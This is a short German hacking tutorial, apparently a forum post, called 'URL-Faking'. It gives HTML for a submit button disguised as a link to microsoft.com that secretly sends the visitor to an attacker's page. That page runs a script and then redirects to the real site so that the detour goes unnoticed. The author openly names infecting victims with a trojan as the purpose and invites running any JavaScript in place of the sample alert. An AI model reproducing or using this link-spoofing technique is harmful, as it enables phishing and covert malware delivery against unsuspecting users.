URL-Faking (by GaSmo)

Hier möchte Ich euch schnell zeigen wie einfach es ist einen Link unbemerkt umzuleiten. Das kann man z.B. dafür ausnutzen jemanden unbemerkt mit einem Trojaner oder ähnlichem zu infizieren. Das ganze schaffen wir durch ein Formular das in den Link eingebettet ist. Damit der User davon nichts mitbekommt muss man den Submit-Button des Formulars wie einen Link gestallten.
Hier jetzt den Code für den Unsichtbaren Submit-Button:

Code:
<A 
href="http://www.microsoft.com">
<FORM action=http://www.deine-page/deine.html method=get>
<INPUT style="BORDER-RIGHT: 0pt;
BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR: 
hand; COLOR:blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;TEXT-DECORATION: underline" type=submit 
value=http://www.microsoft.com>
</A>
Input style ist so angelegt das der normalerweise graue submit-Button unsichtbar ist und nur der Text angezeigt wird.
Die Adresse der action müsst ihr natürlich anpassen.
Sie sollte auf eure Script-Seite verweisen.
Diese könnte wie folgt aussehen:

Code:
<html>
<body>
<script>alert('TEST - NPS-TEAM.com')</script>
<script>top.location.href="http://www.microsoft.com"</script>
</body>
</html>
Dies gibt eine Alertmeldung aus und leitet den User dann sofort weiter,möglichst auf die Seite die Ihr auch als Link angegeben hattet damit niemandem der kleine Ausflug auffällt. Natürlich kann man anstatt des Alert auch jeden anderen Javascript usw. ausführen. So, das war's auch schon. Ist doch gar nicht so schwer =D

© by: GaSmo